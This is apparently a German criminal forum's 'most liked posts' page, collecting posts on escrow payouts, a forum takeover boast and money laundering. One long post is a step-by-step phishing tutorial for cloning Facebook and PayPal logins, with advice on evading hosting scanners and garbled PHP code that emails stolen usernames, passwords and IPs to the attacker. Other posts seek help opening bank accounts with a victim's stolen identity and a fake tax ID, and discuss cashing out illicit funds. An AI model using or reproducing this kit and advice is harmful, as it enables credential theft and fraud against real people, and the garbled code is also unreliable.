Jump to content

Leaderboard

Popular Content

Showing most liked content on 12/02/25 in Posts

  1. Ich verstehe euch alle!!. Die Kohle ist verplant. Schulden beim Dealer. Die Nutten sind schon bestellt etc. Und dann das.... Spass beiseite, weil ernstes Thema. Konnte aber nicht anders.😉 Mein Vorschlag: Warten auf el Cheffe. Bin mir sicher, das wird sich klären Andere Möglichkeit gibt es ja eh nicht! LG Bulli
    3 likes
  2. Nicht böse sein. Aber das ist die Scene! Den meisten geht es eigentlich nur um Geld. Mitleid, Mitgefühl etc. wirst du hier nicht unbedingt finden! Das ist hier ein Haifischbecken und keine Pfadfindertruppe. Ich mache auch "böse" Sachen, habe aber meinen eigenen, moralischen Kompass. Bedeutet, das ich noch lange nicht alles mache...😉 LG Bulli
    2 likes
  3. „1“ ist das nicht offensichtlich genug? TH ausschließlich über Cstate.to und falls auf Telegram was gemacht wird, immer hier erstmal per PM bestätigen lassen! Faulheit wird bestraft!
    2 likes
  4. Na danke hab echt gedacht das hier keiner versteht worum es geht ! Bei solchen Aktionen können Leute richtig Probleme kommen und am Ende ruiniert Ihr ein Business und nehmt den Leuten ihr Brot das nicht korrekt . Aber bringt ja alles nix dann warte ich mal weiter wie ein Hund
    2 likes
  5. Moin. Kann nur sagen, das Cheffe eigentlich täglich ausgezahlt hat! Gestern/vorgestern(?) sagte er, dass später ausgezahlt wird. Cheffe ist eigentlich immer nur kurz online. Ich persönlich mache mir aber keine Sorgen. Zumal ich die Summe im Treuhandtopf als Kleingeld betrachte. Kenne da andere Summen! LG Bulli
    2 likes
  6. @import url('https://fonts.googleapis.com/css2?family=Orbitron:wght@400;600;700;900&family=Inter:wght@300;400;500;600;700&display=swap'); .crime-statement { font-family: 'Inter', -apple-system, BlinkMacSystemFont, sans-serif; background: #0a0a0f; background-image: radial-gradient(circle at 20% 50%, rgba(255, 0, 0, 0.1) 0%, transparent 50%), radial-gradient(circle at 80% 80%, rgba(255, 0, 0, 0.05) 0%, transparent 50%), radial-gradient(circle at 40% 20%, rgba(255, 255, 255, 0.02) 0%, transparent 50%); color: #b8b8c0; padding: 40px 30px; border-radius: 2px; position: relative; overflow: hidden; max-width: 100%; margin: 0 auto; } .crime-statement::before { content: ''; position: absolute; top: 0; left: 0; right: 0; bottom: 0; background-image: radial-gradient(2px 2px at 20% 30%, rgba(255, 255, 255, 0.1) 50%, transparent 50%), radial-gradient(2px 2px at 60% 70%, rgba(255, 255, 255, 0.08) 50%, transparent 50%), radial-gradient(1px 1px at 90% 10%, rgba(255, 255, 255, 0.12) 50%, transparent 50%); background-size: 200px 200px; animation: stars 100s linear infinite; pointer-events: none; opacity: 0.5; } @keyframes stars { from { transform: translateY(0); } to { transform: translateY(-200px); } } .crime-logo-transition { position: relative; z-index: 1; margin-bottom: 40px; display: flex; align-items: center; justify-content: center; gap: 30px; padding: 30px 0; flex-wrap: wrap; } .logo-container { position: relative; display: flex; align-items: center; justify-content: center; } .logo-bn { max-height: 60px; width: auto; filter: grayscale(100%) brightness(0.7); opacity: 0.5; transition: all 0.5s ease; } .logo-bn:hover { filter: grayscale(50%) brightness(0.8); opacity: 0.7; } .logo-arrow { font-size: 40px; color: #ff3333; animation: arrow-pulse 1.5s infinite; text-shadow: 0 0 20px rgba(255, 51, 51, 0.5); } @keyframes arrow-pulse { 0%, 100% { transform: translateX(0); opacity: 0.5; } 50% { transform: translateX(10px); opacity: 1; } } .logo-cstate { max-height: 60px; width: auto; filter: drop-shadow(0 0 20px rgba(255, 51, 51, 0.5)); animation: logo-glow 2s ease-in-out infinite alternate; } @keyframes logo-glow { from { filter: drop-shadow(0 0 20px rgba(255, 51, 51, 0.5)); } to { filter: drop-shadow(0 0 30px rgba(255, 51, 51, 0.8)); } } .crime-header { position: relative; z-index: 1; margin-bottom: 30px; text-align: center; } .crime-title { font-family: 'Orbitron', monospace; font-size: 28px; font-weight: 700; color: #ffffff; text-transform: uppercase; letter-spacing: 2px; margin: 0 0 10px 0; text-shadow: 0 0 30px rgba(255, 51, 51, 0.5); } .crime-subtitle { font-size: 12px; color: #666; text-transform: uppercase; letter-spacing: 3px; font-weight: 400; } .crime-divider { height: 1px; background: linear-gradient(90deg, transparent, #ff3333, transparent); margin: 30px 0; opacity: 0.3; position: relative; z-index: 1; } .crime-admin-proof { position: relative; z-index: 1; margin: 30px 0; text-align: center; } .crime-admin-image { max-width: 100%; height: auto; border: 1px solid rgba(255, 51, 51, 0.3); border-radius: 4px; box-shadow: 0 0 40px rgba(255, 51, 51, 0.2); } .crime-admin-caption { margin-top: 15px; font-family: 'Orbitron', monospace; font-size: 11px; color: #ff3333; text-transform: uppercase; letter-spacing: 2px; opacity: 0.8; } .crime-content { position: relative; z-index: 1; } .crime-text { color: #a8a8b0; font-size: 14px; line-height: 1.8; margin: 20px 0; font-weight: 400; } .crime-highlight { color: #ff3333; font-weight: 600; text-shadow: 0 0 10px rgba(255, 51, 51, 0.3); } .crime-strong { color: #ffffff; font-weight: 600; } .crime-box { background: rgba(13, 13, 18, 0.8); border: 1px solid rgba(255, 51, 51, 0.2); border-left: 3px solid #ff3333; padding: 20px; margin: 25px 0; position: relative; backdrop-filter: blur(10px); transition: all 0.3s ease; } .crime-box:hover { background: rgba(13, 13, 18, 0.95); border-color: rgba(255, 51, 51, 0.4); transform: translateX(2px); } .crime-box-header { color: #ff3333; font-family: 'Orbitron', monospace; font-size: 12px; font-weight: 700; text-transform: uppercase; letter-spacing: 2px; margin-bottom: 10px; display: flex; align-items: center; gap: 10px; } .crime-box-icon { width: 20px; height: 20px; display: inline-flex; align-items: center; justify-content: center; background: rgba(255, 51, 51, 0.2); border: 1px solid rgba(255, 51, 51, 0.4); font-size: 11px; } .crime-box-content { color: #888; font-size: 13px; line-height: 1.6; } .crime-warning { background: rgba(20, 10, 10, 0.8); border-color: rgba(255, 51, 51, 0.4); } .crime-success { background: rgba(10, 20, 10, 0.8); border-color: rgba(51, 255, 51, 0.3); border-left-color: #33ff33; } .crime-success .crime-box-header { color: #33ff33; } .crime-success .crime-box-icon { background: rgba(51, 255, 51, 0.2); border-color: rgba(51, 255, 51, 0.4); } .crime-list { list-style: none; padding: 0; margin: 20px 0; } .crime-list li { color: #888; font-size: 13px; padding: 10px 0; padding-left: 30px; position: relative; border-bottom: 1px solid rgba(255, 255, 255, 0.05); } .crime-list li:last-child { border-bottom: none; } .crime-list li::before { content: '▸'; position: absolute; left: 0; color: #ff3333; font-weight: bold; text-shadow: 0 0 5px rgba(255, 51, 51, 0.5); } .crime-stats { display: grid; grid-template-columns: repeat(auto-fit, minmax(150px, 1fr)); gap: 15px; margin: 30px 0; } .crime-stat { background: rgba(13, 13, 18, 0.6); border: 1px solid rgba(255, 51, 51, 0.1); padding: 20px; text-align: center; transition: all 0.3s ease; } .crime-stat:hover { background: rgba(13, 13, 18, 0.8); border-color: rgba(255, 51, 51, 0.3); transform: translateY(-2px); } .crime-stat-value { font-family: 'Orbitron', monospace; color: #ff3333; font-size: 28px; font-weight: 700; display: block; text-shadow: 0 0 20px rgba(255, 51, 51, 0.5); } .crime-stat-label { color: #666; font-size: 11px; text-transform: uppercase; letter-spacing: 1px; margin-top: 8px; } .crime-badge { display: inline-block; background: #ff3333; color: #000; padding: 4px 12px; font-size: 10px; font-weight: 700; text-transform: uppercase; letter-spacing: 1px; margin: 0 5px; animation: pulse 2s infinite; } .crime-badge-success { background: #33ff33; } @keyframes pulse { 0%, 100% { opacity: 1; } 50% { opacity: 0.7; } } .crime-footer { text-align: center; margin-top: 50px; padding-top: 30px; border-top: 1px solid rgba(255, 51, 51, 0.1); position: relative; z-index: 1; } .crime-signature { font-family: 'Orbitron', monospace; color: #666; font-size: 11px; text-transform: uppercase; letter-spacing: 2px; } .crime-team { color: #ff3333; font-weight: 700; font-size: 13px; margin-top: 10px; } @media (max-width: 600px) { .crime-statement { padding: 20px; } .crime-logo-transition { flex-direction: column; gap: 20px; } .logo-arrow { transform: rotate(90deg); } @keyframes arrow-pulse { 0%, 100% { transform: rotate(90deg) translateX(0); opacity: 0.5; } 50% { transform: rotate(90deg) translateX(10px); opacity: 1; } } .crime-stats { grid-template-columns: 1fr; } } → Kapitel geschlossen. Black-Network.to → CState.to ✓Access Granted - volle kontrolle. Vollständige Übernahme der black-network.to Infrastruktur erfolgreich abgeschlossen. [ blacknet - Admin Panel ] Die Plattform black-network.to war über Jahre hinweg ein Ort voller Schatten, Scam-Strukturen und fragwürdiger Kontrolle durch Emre. Zahlreiche User wurden manipuliert, Gelder verschwanden über interne Treuhänder. Nach direktem Zugriff auf Server, Datenbank und interne Inhalte haben wir als cstate.to entschieden: Totale Bereinigung. 160K PMS WAREN NOCH GESPEICHERT 9.2K USER SEIT CRIMEMARKET NEU Start ! Critical Information Alle Inhalte wurden mehrfach überschrieben und sicher gelöscht. Chats, Wallet-Logs, User-Historien - alles entfernt. Archive existieren nur verschlüsselt unter Kontrolle von Krypton. Wir führen keine Scam Plattform fort. Dies ist ein klares Statement gegen interne Scams und für eine saubere Szene. Daher gilt: Emres Kapitel ist endgültig beendet. Die Domain leitet ab sofort direkt auf diesen Beitrag weiter. Vollständige Transparenz und Offenheit Anti Scam Mechanismen aktiv Automatische PM Purging > alle 14 Tage Rotierende Logs – Zero Trust Architecture Keine Hidden Panels oder Backdoors & regelmäßige Security Checks. → Für ehemalige Black-Network User Ehemalige Black-Network-User sind bei cstate.to willkommen. Bekannte Mitglieder („alte Hasen“) können ihre früheren Ränge mit Nachweisen neu beantragen. 👉 User Verifizierungen An die Presse & Szene-Beobachter (inkl. Tarnkappe.info): Dies ist kein normaler Forenwechsel. Es ist ein kontrollierter Bruch mit der Vergangenheit. Verantwortung statt Vertuschung. Kontakt: @ Krypton ADMIN VERIFIED - CrimeState official - CSTATE.TO // AUGUST 2025
    2 likes
  7. Ich werde euch einige Tutorial for free zur Verfügung stellen. Die Tutorials sind alle public und ich übernehme keine Garantie, ob die Ausführung der Tutorials noch funktionieren. Einfach ausprobieren. https://workupload.com/start/vpNbMTJNDXR
    1 like
  8. How to Create Scam page? Recently I have come across many guides about creating phishing pages. Although the principles behind each guide are similar, most of the hosting solutions provided in the guide does not work anymore due to an increase in the crackdown of phishing pages by the hosting companies. In this guide, I will go through every step necessary to create and host a phishing page of your choice. Enjoy for that we writing How to Code Scam Page. Step 1Download the HTML Index of the Target Webpage To start off, you need to obtain the HTML index of the page. There are various methods of doing this, there are even templates online for popular sites. In this tutorial, I am going to use the most basic way in order to be as noob-friendly as possible , lets know How to Code Scam Page Navigate to Your Webpage In this tutorial, I am going to phish Facebook. View the Source of the Webpage. Depending on your browser, there may be different methods. Normally it is done by right-clicking the site and clicking “View Source”. I have done that on my browser and windows should come out similar to this make sure to research on that more How to Code Scam Page On the box to the right is the source of the website. Which leads on to the next step: Downloading and Saving the Source Code Select the box, and copy-paste everything in the box to a txt document. Use Notepad on windows, and a simple text editing program if you are not using windows. (Don’t use programs like Word or Pages because it is really slow). After you have done that, click “Save As” or whatever option that allows you to save that document. On Notepad it should look like this: Change “Save as type” to All Files and change the encoding to Unicode. After that, name the document “index.html”, obviously without the speech marks How to Code Scam Page. Congratulations! You have finished the first step of the tutorial! How to Code Scam Page Step 2 Creating a PHP File for Password Harvesting The PHP file is basically the tool that harvests the users password in this scenario. There are several ways you can create this PHP if you have some programming knowledge, but if you don’t, just copy my exemplar PHP. Same as above, save the PHP file as “All Files” and as “post.php”. Change the encoding to Unicode and you should be ready to go! Step 3 Modify the Page HTML File to Incorporate Your PHP File in It. Now, we need to incorporate our PHP file, to receive passwords that the users send. Find the Password-Sending Method First, you need to see how the website deals when the user submits a username-password. For Facebook, all you need to do is to Ctrl-F and type “=action” in the field.https://0ba65e4a67cb4f162092f4edc8bf9129.safeframe.googlesyndication.com/safeframe/1-0-37/html/container.html Now, you need to replace everything in the underlined portion with “post.php”, keep the speech marks. (just one set please) How to Code Scam Page. Obviously, this method will be different for other websites. A good method to find it is by using the Inspect Elements tool in most modern browsers and clicking on the login button. Find something similar to the above method. How to Code Scam Page Please note: You will need to change this later when you actually host the website How to Code Scam Page How to Code Scam Page. Step 4 Hosting the PHP File for Password Storing Now here is the juicy part, making your fake website online so other people can browse it How to Code Scam Page. You can use any free hosting services to host and store passwords. However, the hosting plan has to include something called “FTP”. For this tutorial, I will be using 000webhost. Navigate to the FTP Server for Your Web Hosting Service For this step, I assume that you have already created a website with your hosting service.https://0ba65e4a67cb4f162092f4edc8bf9129.safeframe.googlesyndication.com/safeframe/1-0-37/html/container.html For 000webhost, you simply click on “File manager” and click “Upload Files”. Here is a picture of the FTP server for 000webhost: Ignore the other files, those are just some of my personal stuff, unrelated to this tutorial How to Code Scam Page. Upload Your PHP Files and Change Permission As you can see, I have already uploaded my PHP file. But you need to just upload it to the main folder of your FTP server. (Some FTP server doesn’t allow you to upload to the root folder, just follow their particular instructions). Now you need to change the permission to “777”, which is basically every single permission. When prompted to tick boxes for the permissions, just tick every single one How to Code Scam Page. Now you can close the FTP server. Note down your web address! Step 5 Hosting the Actual Phishing Page For this step, you will need to use the exact hosting provider that I use, otherwise you will get banned.https://0ba65e4a67cb4f162092f4edc8bf9129.safeframe.googlesyndication.com/safeframe/1-0-37/html/container.html There is a reason why I don’t use the same hosting provider for my actual page, and that is because most hosting providers will employ some kind of scanning to detect phishing pages. I can tried multiple hosting services in the past and all of them banned me within 30 mins of uploading the index file. Configuring the post.php Forum Now, before you host the website, remember the post.php/login form thing we configured above? You need to find the login form thing again in your index.html and replace the “post.php” with “http://yourwebsiteforyourpostphpupload/post.php”, assuming that you uploaded to the root folder. Remember to add HTTP:// in front of the site. In order to test this, navigate to the website (http://yourwebsiteforyourpostphpupload/post.php) and see if it redirects you to Facebook.com, if it does then you have pasted the correct site. If it doesn’t, then double-check if you have uploaded your file to the correct directory How to Code Scam Page. Hosting the Actual Page Navigate to htmlpasta.com. You will see something similar to this: Then, you need to copy the index.html file for your phishing site and paste it in here How to Code Scam Page. Now, click on the reCAPTCHA and click paste, you will get a link for your website How to Code Scam Page. Step 6 Congratulations! Congrats! You have finished hosting your first phishing site! Navigate to your site and try to enter some fake login details, after you click the login button, it should redirect you to facebook.com. Login to your FTP server that you hosted your post.php file, and there should be a new document called Log.txt that is stored within the same folder as your post.php file. Any login details should be stored there. Remember, please do not use this for malicious purpose, only use for penetration testing and with authorisation from your victims. If you have any question then please comment down below How to Code Scam Page. phishing is the term usedfor this scam.1] OK, so first we choose a target.We chose www.paypal.com2] Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on yourcomputer.3] We open … There might be a problem, namely the way the image.4] If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path 5] Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F … (Here the words are different .. try and password, password, username, etc.. Dak login does not work).6] You have a code like <form action=”login2.php”>. Login2.php change in 040147.php!7] Now, the username should be a code like . name = “email” tells us that in PHP script authentication is the variable that you email username.8] Good memory.The password, the code should be similar ( ). So, password is held in variable password. A and memorize it.9] Now, where you have saved. Html, created a new file called 040147.php.In it, add the following code:Code:$ To = “[email protected]”$ Name = $ _POST [’email’];$ Email = $ _POST [’email’];$ Subject = $ _POST [‘subject’];$ Password = $ _POST [‘password’];$ Agent = $ _SERVER [‘HTTP_USER_AGENT’];$ Ip = $ _SERVER [‘REMOTE_ADDR’];$ D = date (‘l dS \ of F Y h: i: s A’);$ Sub = “New Account Hacked PayPal – $ email”;$ Headers = “From: $ name <$ email> \ n”;$ Headers .= “Content-Type: text / plain, charset = iso-8859-1 \ n”;$ Mes .= ‘Username:’. $ Email. “\ N”;$ Msg .= “Password:”. $ Password. “\ N”;$ Msg .= “Browser:”. $ Agent. “\ N”;$ Msg .= “IP:”. $ Ip. “\ N”;$ Mes .= ‘Date and time:’. $ D;(mail ($ to, $ sub, $ mes, $ headers);header (“Location: www.paypal.com“);)?>10] Modify codeCode:$ To = “[email protected]”and put your mail. The code above variables over email and password and sends them together with some more useful details.11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain. : Wink:YOUR SCAMPAGE IS READY NOW. ENJOY SPAMMING How to Code Scam Page How does this scam work? A scammer contacts you pretending to be from a legitimate business such a bank, telephone or internet service provider. You may be contacted by email, social media, phone call, or text message.Clues for spotting a fake email The scammer asks you to provide or confirm your personal details. For example, the scammer may say that the bank or organisation is verifying customer records due to a technical error that wiped out customer data. Or, they may ask you to fill out a customer survey and offer a prize for participating. Alternatively, the scammer may alert you to ‘unauthorised or suspicious activity on your account’. You might be told that a large purchase has been made in a foreign country and asked if you authorised the payment. If you reply that you didn’t, the scammer will ask you to confirm your credit card or bank details so the ‘bank’ can investigate. In some cases the scammer may already have your credit card number and ask you to confirm your identity by quoting the 3 or 4 digit security code printed on the card How to Code Scam Page. Phishing messages are designed to look genuine, and often copy the format used by the organisation the scammer is pretending to represent, including their branding and logo. They will take you to a fake website that looks like the real deal, but has a slightly different address. For example, if the legitimate site is ‘www.realbank.com.au’, the scammer may use an address like ‘www.reallbank.com’. If you provide the scammer with your details online or over the phone, they will use them to carry out fraudulent activities, such as using your credit cards and stealing your money. Spamming is the use of messaging systems to send an unsolicited message (spam) to large numbers of recipients for the purpose of commercial advertising, for the purpose of non-commercial proselytizing, or for any prohibited purpose (especially the fraudulent purpose of phishing). While the most widely recognized form of spam is email spam, the term is applied to similar abuses in other media: instant messaging spam, Usenet newsgroup spam, Web search engine spam, spam in blogs, wiki spam, online classified ads spam, mobile phone messaging spam, Internet forum spam, junk fax transmissions, social spam, spam mobile apps,[1] television advertising and file sharing spam. It is named after Spam, luncheon meat, by way of a Monty Python sketch about a restaurant that has Spam in almost every dish and where Vikings annoyingly sing “Spam” over and over again.[2] Spamming remains economically viable because advertisers have no operating costs beyond the management of their mailing lists, servers, infrastructures, IP ranges, and domain names, and it is difficult to hold senders accountable for their mass mailings. The costs, such as lost productivity and fraud, are borne by the public and by Internet service providers, which have added extra capacity to cope with the volume. Spamming has been the subject of legislation in many jurisdictions How to Code Scam Page. A person who creates spam is called a spammer. Mobile phone Mobile phone spam Mobile phone spam is directed at the text messaging service of a mobile phone. This can be especially irritating to customers not only for the inconvenience but also because of the fee they may be charged per text message received in some markets. To comply with CAN-SPAM regulations in the US, SMS messages now must provide options of HELP and STOP, the latter to end communication with the advertiser via SMS altogether How to Code Scam Page. Despite the high number of phone users, there has not been so much phone spam, because there is a charge for sending SMS. Recently, there are also observations of mobile phone spam delivered via browser push notifications. These can be a result of allowing websites which are malicious or delivering malicious ads to send a user notifications.[ Social networking spam Main article: Social networking spam Facebook and Twitter are not immune to messages containing spam links. Spammers hack into accounts and send false links under the guise of a user’s trusted contacts such as friends and family. As for Twitter, spammers gain credibility by following verified accounts such as that of Lady Gaga; when that account owner follows the spammer back, it legitimizes the spammer. Twitter has studied what interest structures allow their users to receive interesting tweets and avoid spam, despite the site using the broadcast model, in which all tweets from a user are broadcast to all followers of the user. Spammers, out of malicious intent, post either unwanted (or irrelevant) information or spread misinformation on social media platforms How to Code Scam Page How to Code Scam Page. Social spam Spreading beyond the centrally managed social networking platforms, user-generated content increasingly appears on business, government, and nonprofit websites worldwide. Fake accounts and comments planted by computers programmed to issue social spam can infiltrate these websites. Blog, wiki, and guestbook Main article: Spam in blogs How to Code Scam Page Blog spam is spamming on weblogs. In 2003, this type of spam took advantage of the open nature of comments in the blogging software Movable Type by repeatedly placing comments to various blog posts that provided nothing more than a link to the spammer’s commercial web site.[30] Similar attacks are often performed against wikis and guestbooks, both of which accept user contributions. Another possible form of spam in blogs is the spamming of a certain tag on websites such as Tumblr. How to Code Scam Page Whaling and spear-phishing – the scammer targets a business in an attempt to get confidential information for fraudulent purposes. To make their request appear legitimate, they use details and information specific to the business that they have obtained elsewhere. Pharming – the scammer redirects you to a fake version of a legitimate website you are trying to visit. This is done by infecting your computer with malware which causes you to be redirected to the fake site, even if you type the real address or click on your bookmarked link. Warning signs You receive an email, text, or phone call claiming to be from a bank, telecommunications provider, or other business you regularly deal with, asking you to update or verify your details. The email or text message does not address you by your proper name and may contain typing errors and grammatical mistakes. The website address does not look like the address you usually use and is requesting details the legitimate site does not normally ask for. You notice new icons on your computer screen, or your computer is not as fast as it normally is How to Code Scam Page Protect yourself How to Code Scam Page Always keep your computer security up to date with anti-virus and anti-spyware software, and a good firewall. Only buy a computer and anti-virus software from a reputable source. Use your security software to run a virus check if you think your computer’s security has been compromised. If you still have doubts, contact your anti-virus software provider or a computer specialist. Secure your networks and devices, and avoid using public computers or WiFi hotspots to access or provide personal information. Choose passwords and PINs that would be difficult for others to guess, and update them regularly. Do not save them on your phone or computer. Do not open attachments or click on links in emails or social media messages you’ve received from strangers – just press delete. Be wary of free downloads and website access, such as music, games, movies and adult sites. They may install harmful programs without you knowing. Do not use software that auto-completes online forms. Visit Stay Smart Online for tips on how to protect your personal and financial information online How to Code Scam Page.
    1 like
  9. Moin liebe Mitkriminelle. Meine Frage: Beim erstellen von Bds werde ich öfters nach einer SteuerID gefragt. Habe viele Daten meines Vics, aber nicht diese Nummer. Soll ich ne Fakenummer eingeben. Und , ich weiß das die Nummer das Geburtsdatum beinhalten muss. Kann die Bank die SteuerID prüfen oder wird es erst interessant sobald eine hohe Summe eingeht und die Bank das dem Steuer melden muss. Danke für euere Hilfe! LG Bulli
    1 like
  10. Hallo, Ich suche leute zum Connecten , habe erfahrung in manchen bereich , wer interesse hat zu connecten soll sich bei mir melden.
    1 like
  11. Der Kryptomixer cryptomixer.io steht im Mittelpunkt der jüngsten Aktion der Schweizer Behörden. Die Webseite diente dazu — so laut offiziellen Angaben — Gelder aus verschiedenen kriminellen Aktivitäten zu verschleiern. Die Plattform war sowie im normalen Internet als ebenfalls im Darknet erreichbar und bot einen hybriden Mixing-Dienst an. Damit konnten Nutzer ihre illegalen Einnahmen verbergen. Laut Europol wurden seit 2016 weiterhin als 1⸴3 Milliarden Euro durch den Dienst gewaschen. Die erfolgreiche Festnahme: Operation Olympia Nach umfangreichen Ermittlungen der Staatsanwaltschaft Zürich in Zusammenarbeit mit Eurojust, Europol und dem Landeskriminalamt Hessen gelang es — wie in einer gemeinsamen Pressemitteilung bekanntgegeben wird — die Server-Infrastruktur des Bitcoin-Mixers im Kanton Zürich auszuschalten. Diese Aktion wurde unter dem Codenamen Operation Olympia bekannt. Innerhalb weniger Monate wurde die Infrastruktur gezielt zerstört. Endgültig abgeschaltet wurde die Plattform Ende November 2025. Drei Server und auch die Domain konnten beschlagnahmt werden. Datenanalyse in Arbeit Beobachtern zufolge werden die gesicherten Daten momentan intensiv ausgewertet. Insgesamt wurden Bitcoin im Wert von 23 Millionen Franken sichergestellt. Zurzeit liegt das Hauptaugenmerk auf der Analyse von rund 12 Terabyte an digitalen Daten. Die Ermittlung der Nutzer und Betreiber ist Bestandteil der laufenden Untersuchung. Die Behörden hoffen – dadurch die Hintergründe der kriminellen Nutzung besser zu verstehen. Der Mechanismus hinter cryptomixer.io Der Dienst fungierte als eine Art digitaler Kreislauf für Geld. Nutzer konnten ihre kriminell erlangten Bitcoins in den Pool einspeisen. Dieser wurde — mithilfe einer komplexen Verschleierung — so verarbeitet. Dass Rückverfolgbarkeit nahezu unmöglich wurde. Anschließend wurden die Gelder nach einer festgelegten Frist wieder in Form weißer Coins an die gewünschten Adressen ausgezahlt. Diese Vorgehensweise erschwerte die Spuren des Geldes auf der Blockchain erheblich. Bedeutung für die Cybersicherheitslage Kryptomixer sind für Kriminelle attraktive Werkzeuge. Sie ermöglichen das Waschen von Geldern aus Ransomware, Betrügereien, Waffen- oder Drogengeschäften. Durch die Verschleierung der Herkunft kommen illegale Einnahmen besser ins Finanzsystem. Neben Kriminellen profitieren auch Nutzer die Wert auf Anonymität legen, da die Dienste effektiv den Datenschutz sichern. Allerdings bleibt unklar ebenso wie sicher diese Dienste wirklich sind weil sie ihre Methoden nie offenlegen. Quelle: https://nydus.org/news/134321-erfolg-im-kampf-gegen-kryptowahrungs-geldwasche-operation-olympia-beschlagnahmt-23-millionen-franken.html Archive: https://archive.is/AP8Hk
    1 like
  12. In brief. DAI is an Ethereum-based stablecoin. Its price is kept in check through a system of smart contracts that automatically execute themselves. The DeFi boom has heralded the emergence of a number of services offering to lend on DAI deposits. There are plenty of stable digital currencies available, but only one can claim to be widely used, decentralized , and trustless. In this article, we find out why DAI stands out from the rest of the stablecoin pack. Crypto with steady value isn’t new or rare. Tether has been around for years and is by far the largest stablecoin available. We also have stablecoins such as USDC, PAX, Gemini Coin, and Facebook's upcoming Diem (formerly Libra) all competing to be the stable cryptocurrency of choice, but they all rely on trusting someone to honestly keep dollars in the bank. DAI changes that. What is DAI? DAI is an ERC20 token on the Ethereum blockchain that has a steady value of one US dollar. It is also the key to the MakerDAO lending system. When a loan is taken out on MakerDAO, DAI is created. It’s the currency users borrow and pay-back. Once DAI is created, it functions simply as a stable Ethereum token. It can be used to pay for things and is easily transferred between Ethereum wallets. Who Invented DAI? DAI is a product of MakerDAO, which was founded by Rune Christensen, the current CEO. Did you know? The current version of DAI is technically an updated version of the stablecoin called multi-collateral DAI because it allows multiple types of crypto assets to be used to create DAI. The old version of DAI is now called SAI and known as single-collateral DAI because it could only be created by using ETH as collateral. The first crypto asset besides ETH accepted in the new multi-collateral DAI system is Basic Attention Token (BAT). What’s so special about it? The price of DAI is kept in check through a system of smart contracts automatically executing themselves. If the price of DAI fluctuates too far from one dollar, Maker (MKR) tokens are burned or created in order to stabilize the price of DAI. MakerDAO’s algorithms automatically manage the price of DAI so no one person needs to be trusted to keep the currency steady. If the system works as intended and one DAI equals one US dollar, MKR holders benefit because the total supply of MKR decreases–making MKR more rare and valuable. To date, DAI has remained stable for over three years with only minor fluctuations from its one dollar price peg. Did you know? MakerDAO upgraded its system to include the DAI Savings Rate in which DAI holders can lock their DAI holdings into MakerDAO’s Oasis app to earn interest. What else is different? Since DAI is simply a token on Ethereum, anybody can use or build with DAI without permission. As an ERC20 token, DAI functions as a building block that can be incorporated into any decentralized application (dapp) needing a stable asset or payment system. Developers can also wrap DAI in different smart contracts and modify it for different uses. For example, xDAI takes DAI and puts it on a superfast and low-cost sidechain to make transfers and payments easier and more efficient. Chai and rDAI takes normal DAI, puts it in an interest generating pool, and lets users control what happens to the interest as it accumulates. How is DAI produced? DAI is created whenever someone takes out a loan on MakerDAO. DAI is destroyed when loans are paid back. How do you get hold of DAI tokens? The most direct way to get DAI is by taking out a loan on MakerDAO’s Oasis platform. You can also trade DAI on that same platform or use a centralized exchange such as Coinbase. What can you do with DAI? One of the main uses for DAI is as a stable hedge or counterweight against the volatility of more popular crypto-assets such as Ethereum or Bitcoin. The stable value of DAI means it is good for investors or traders who believe the market is about to go down. Coinbase's debit card. Image: Coinbase The Best Bitcoin Debit Cards To Use In 2021 While a few retailers accept direct payments of cryptocurrency, the overwhelming majority do not. There’s a way around that, however: crypto debit cards—which let you spend your crypto just like they were fiat currencies, such as the US dollar, the British pound or the Euro. A crypto debit card, upon the point of sale, converts the crypto you have stored in your debit card account to the fiat currency that everyone accepts. You can use crypto debit cards at ATMs, in shops, and on online merchant... Reviews Others 7 min read Robert StevensDec 2, 2020 Since DAI is stable, it’s also one of the most ideal crypto assets to spend. The Coinbase Card allows users to spend DAI and other crypto assets by converting the crypto into fiat on a Visa card. If you are in the UK or Europe, you can also spend DAI using the Monolith Visa debit card. DeFi and DAI The 2020 boom in decentralized finance (DeFi) has seen DAI emerge as one of the most popular assets in the DeFi ecosystem. A number of services have emerged offering to lend on DAI deposits. Coinbase customers from the US, UK, Netherlands, Spain, France, and Australia can earn two percent a year on their DAI deposits. A dapp dubbed dPiggy not only allows users to earn interest, but also have their returns automatically used to purchase a variety of crypto assets at the end of each month. Bitcoin can now also be used to generate DAI. Stablecoins in the crosshairs A market crash in March 2020 threatened DAI’s stability, and developers introduced a controversial feature to allow it to maintain its peg aided by another stablecoin, USDC. Then, in July 2020, an upgrade to one of the major DeFi lending protocols again caused DAI to come off its peg, and the community voted to increase the system’s debt ceiling. The following month, it voted to prioritize GUSD, BUSD, and eight other tokens for inclusion as collateral, which would allow them to be used to create DAI, and create more liquidity. Most recently, regulators have turned their attention to stablecoins; in the US, the proposed STABLE Act would hold stablecoin issuers to some of the same standards as banks. Legislation of this kind could have serious consequences for a decentralized stablecoin such as DAI. Peter Van Valkenburgh, research director at crypto advocacy non-profit CoinCenter, argues that were the STABLE Act (or something like it) to pass, DAI validator nodes could find themselves in violation of the law unless they're a chartered bank. Nonetheless, geopolitical upheaval is making stablecoins more popular than ever; when Argentina imposed a new 35% tax on all purchases made in US dollars, DAI trading volume spiked on local exchanges on the news. The Future MakerDAO is working hard to brand DAI as the “world’s first unbiased currency” and it’s starting with the logo, which it wants to be as ubiquitous and recognizable as symbols for the dollar ($), euro (€), and pound (£). In the quest to become the first trustless mainstream currency, DAI will have to be adopted and used by millions of people–a task requiring not only branding, but also marketing and education. Though not an easy task, no other stablecoin is better positioned to make it happen
    1 like
  13. auscashen geht via advcash/skirll/netseller etc ich habe zu fs zeit angefangen 2010/2012 würde ja webmoney noch genutzen XMR & DAI Coin(decentralized stablecoin) ist auch gut
    1 like
  14. Ich bitte dich, nicht diese Wortwahl zu benutzen. LG von mir.
    1 like
  15. Eigentlich sogut wie alle Online Banken. Selbst Guthabenkonto wären praktisch, zum fillen und/oder auscashen. Brauchst ja nur eine virtuelle Karte
    1 like
  16. Herzlich willkommen in unserer Mitte. Hoffe, du wirst dich hier wohlfühlen!👍 LG Bulli
    1 like
  17. @ Libratello Ich hatte dich gebeten, im Beitrag Nr. 3 von dir den link zu einem anderen Forum zu editieren, der link ist immer noch vorhanden.
    1 like
  18. TH gibts nur auf Cstate oder bei Ausnahmefällen nur über kryptoncs und offensichtlich ist es ein Scammer, ja.
